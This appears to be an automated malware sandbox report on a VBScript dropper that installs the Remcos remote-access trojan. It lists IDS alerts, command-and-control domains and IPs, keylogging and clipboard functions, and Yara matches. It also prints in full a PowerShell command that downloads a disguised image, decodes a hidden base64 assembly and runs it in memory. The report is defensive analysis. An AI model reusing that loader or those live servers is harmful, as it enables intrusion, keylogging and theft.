                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49818 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49825 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49812 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49811 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49844 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49837 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49856 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49857 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49803 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49767 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49831 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49841 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49876 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49824 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49863 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49864 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49871 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49849 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49889 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49883 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49880 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49948 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49922 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49928 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49955 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49967 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49954 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49961 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49993 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49895 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49984 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49970 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49974 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50000 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49805 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49999 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49946 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49935 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49916 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49932 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49940 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50006 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49987 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49980 -> 45.80.158.30:23101
                        Source: Network traffic | Suricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 5.182.211.158:443 -> 192.168.2.4:49737
                        Source: Network traffic | Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 5.182.211.158:443 -> 192.168.2.4:49737
                        Source: Network traffic | Suricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 5.182.211.158:443 -> 192.168.2.4:49755
                        Source: Network traffic | Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 5.182.211.158:443 -> 192.168.2.4:49755
                        Source: Network traffic | Suricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 5.182.211.158:443 -> 192.168.2.4:49755
                        Source: Network traffic | Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 5.182.211.158:443 -> 192.168.2.4:49755
                        Source: Network traffic | Suricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 5.182.211.158:443 -> 192.168.2.4:49737
                        Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 5.182.211.158:443 -> 192.168.2.4:49737
                        Source: Malware configuration extractor | URLs: rem.pushswroller.eu
                        Source: Malware configuration extractor | URLs: firewarzone.ydns.eu
                        Source: Malware configuration extractor | URLs: dim.remofficialws.top
                        Source: Malware configuration extractor | URLs: rem.officialswvrem.top
                        Source: global traffic | TCP traffic: 192.168.2.4:49739 -> 45.80.158.30:23101
                        Source: global traffic | HTTP traffic detected: GET /ink/gre.txt HTTP/1.1 | Host: set.officialswrc.top | Connection: Keep-Alive
                        Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
                        Source: Joe Sandbox View | IP Address: 178.237.33.50
                        Source: Joe Sandbox View | ASN Name: UK2NET-ASGB
                        Source: Joe Sandbox View | ASN Name: SKB-ENTERPRISENL
                        Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49740 -> 178.237.33.50:80
                        Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.32
                        Source: unknown | TCP traffic detected without corresponding DNS query: 23.32.238.18
                        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_004260F7 recv
                        Source: global traffic | HTTP traffic detected: GET /ink/gre.txt HTTP/1.1 | Host: set.officialswrc.top | Connection: Keep-Alive
                        Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
                        Source: global traffic | DNS traffic detected: DNS query: res.cloudinary.com
                        Source: global traffic | DNS traffic detected: DNS query: set.officialswrc.top
                        Source: global traffic | DNS traffic detected: DNS query: rem.pushswroller.eu
                        Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
                        Source: global traffic | DNS traffic detected: DNS query: firewarzone.ydns.eu
                        Source: global traffic | DNS traffic detected: DNS query: dim.remofficialws.top
                        Source: global traffic | DNS traffic detected: DNS query: rem.officialswvrem.top
                        Source: MSBuild.exe, MSBuild.exe, 0000000C.00000002.2256274079.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp
                        Source: MSBuild.exe, 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
                        Source: powershell.exe, 00000001.00000002.2026099087.000001CB43782000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000001.00000002.2026099087.000001CB43561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2351710903.0000025E9C781000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000001.00000002.2002003466.000001CB00E94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2002003466.000001CB00EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://set.officialswrc.top
                        Source: powershell.exe, 00000001.00000002.2026099087.000001CB43782000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 00000001.00000002.2026099087.000001CB43561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2351710903.0000025E9C781000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                        Source: powershell.exe, 00000001.00000002.2026099087.000001CB43782000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                        Source: talpe.vbs.6.dr | String found in binary or memory: https://github.com/koswald/VBScript
                        Source: wscript.exe, 00000008.00000003.1974579887.00000266E0A81000.00000004.00000020.00020000.00000000.sdmp, LbtytfWpvx.vbs, talpe.vbs.6.dr | String found in binary or memory: https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbs
                        Source: wscript.exe, 00000000.00000003.1699236695.0000022E127B1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbsbitC
                        Source: wscript.exe, 00000000.00000003.1702805355.0000022E128B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702649965.0000022E10936000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702365849.0000022E108DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1703228032.0000022E129B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698585874.0000022E127D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.1959638902.00000176D8A20000.00000004.00001000.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1973340251.00000266DEA8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1973834135.00000266DEAE5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1974006639.00000266E0981000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1974579887.00000266E0A81000.00000004.00000020.00020000.00000000.sdmp, LbtytfWpvx.vbs, talpe.vbs.6.dr | String found in binary or memory: https://github.com/koswald/VBScript/blob/master/SetupPerUser.md
                        Source: powershell.exe, 00000001.00000002.2026099087.000001CB43782000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2351710903.0000025E9C9A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://res.cloudinary.com
                        Source: wscript.exe, wscript.exe, 00000008.00000002.1978037118.00000266E0885000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1975830431.00000266E0884000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.1977981910.00000266E0880000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1975290595.00000266E0882000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://res.cloudinary.com/dzvai8
                        Source: wscript.exe, 00000000.00000002.1703716071.0000022E108A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gmeC
                        Source: wscript.exe, 00000008.00000002.1977583212.00000266DEA59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gmeh
                        Source: wscript.exe, 00000000.00000003.1702704778.0000022E108CE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1703772168.0000022E108CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1973920441.00000266DEA7A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.1977583212.00000266DEA7B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvno
                        Source: wscript.exe, 00000000.00000003.1702704778.0000022E108CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnoc
                        Source: wscript.exe, 00000008.00000002.1977583212.00000266DEA7B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnoc//
                        Source: wscript.exe, 00000000.00000002.1703772168.0000022E108CF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnoc0
                        Source: wscript.exe, 00000008.00000003.1973920441.00000266DEA7A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocv4
                        Source: wscript.exe, 00000008.00000002.1977694405.00000266DEADA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1973340251.00000266DEA8F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aC=5
                        Source: wscript.exe, 00000000.00000002.1703853983.0000022E1098E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702472569.0000022E1098A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702503863.0000022E1098D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702365849.0000022E108DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1974450182.00000266DEB3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1973340251.00000266DEA8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1973834135.00000266DEAE5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.1977779291.00000266DEB3E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1974417448.00000266DEB3B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1974240401.00000266DEB38000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa
                        Source: powershell.exe, 00000009.00000002.2351710903.0000025E9C781000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2351710903.0000025E9C9A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg
                        Source: wscript.exe, 00000000.00000003.1702365849.0000022E108DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1703826317.0000022E10929000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1703033281.0000022E10929000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410al
                        Source: wscript.exe, 00000000.00000002.1703716071.0000022E108A8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.1977583212.00000266DEA59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gte
                        Source: powershell.exe, 00000001.00000002.2002003466.000001CB00E94000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://set.officialswrc.top
                        Source: powershell.exe, 00000001.00000002.2002003466.000001CB00E94000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://set.officialswrc.top/ink/gre.txt
                        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49755
                        Source: unknown | Network traffic detected: HTTP traffic on port 49675 -> 443
                        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
                        Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
                        Source: unknown | Network traffic detected: HTTP traffic on port 49755 -> 443
                        Source: unknown | HTTPS traffic detected: 5.182.211.158:443 -> 192.168.2.4:49737 version: TLS 1.2
                        Source: unknown | HTTPS traffic detected: 5.182.211.158:443 -> 192.168.2.4:49755 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_004099E4 SetWindowsHookExA 0000000D,004099D0,00000000
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx
                        Source: Yara match | File source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 8048, type: MEMORYSTR

                        E-Banking Fraud

                        Source: Yara match | File source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0000000C.00000002.2262032025.0000000002D6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000F.00000002.3171710253.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000C.00000002.2256274079.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000F.00000002.3173871595.0000000002B1F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 8048, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 6800, type: MEMORYSTR
                        Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                        Spam, unwanted Advertisements and Ransom Demands

                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_0041BB71 SystemParametersInfoW
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_0041BB77 SystemParametersInfoW

                        System Summary

                        Source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                        Source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                        Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
                        Source: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: Process Memory Space: powershell.exe PID: 7320, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: powershell.exe PID: 7908, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: MSBuild.exe PID: 8048, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Initial file | Dim cmd 'string: ShellExecute arg #1
                        Source: Initial file | Dim args 'string: ShellExecute arg #2
                        Source: Initial file | Dim pwd 'string: ShellExecute arg #3
                        Source: Initial file | Dim privileges 'string: ShellExecute arg #4
                        Source: Initial file | .ShellExecute cmd, args, pwd, privileges
                        Source: Initial file | Dim cmd 'string: ShellExecute arg #1
                        Source: Initial file | 'Class scope: args_ 'string: ShellExecute arg #2
                        Source: Initial file | Dim pwd 'string: ShellExecute arg #3
                        Source: Initial file | Dim privileges 'string: ShellExecute arg #4
                        Source: Initial file | .ShellExecute cmd, args_, pwd, privileges
                        Source: C:\Windows\System32\cmd.exe | Dropped file: Dim cmd 'string: ShellExecute arg #1
                        Source: C:\Windows\System32\cmd.exe | Dropped file: Dim args 'string: ShellExecute arg #2
                        Source: C:\Windows\System32\cmd.exe | Dropped file: Dim pwd 'string: ShellExecute arg #3
                        Source: C:\Windows\System32\cmd.exe | Dropped file: Dim privileges 'string: ShellExecute arg #4
                        Source: C:\Windows\System32\cmd.exe | Dropped file: .ShellExecute cmd, args, pwd, privileges
                        Source: C:\Windows\System32\cmd.exe | Dropped file: Dim cmd 'string: ShellExecute arg #1
                        Source: C:\Windows\System32\cmd.exe | Dropped file: 'Class scope: args_ 'string: ShellExecute arg #2
                        Source: C:\Windows\System32\cmd.exe | Dropped file: Dim pwd 'string: ShellExecute arg #3
                        Source: C:\Windows\System32\cmd.exe | Dropped file: Dim privileges 'string: ShellExecute arg #4
                        Source: C:\Windows\System32\cmd.exe | Dropped file: .ShellExecute cmd, args_, pwd, privileges
                        Source: C:\Windows\System32\wscript.exe | COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}
                        Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                        Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00401F66 appears 50 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 004020E7 appears 40 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 004338A5 appears 41 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00433FB0 appears 55 times
Source: LbtytfWpvx.vbs | Initial sample: Strings found which are bigger than 50
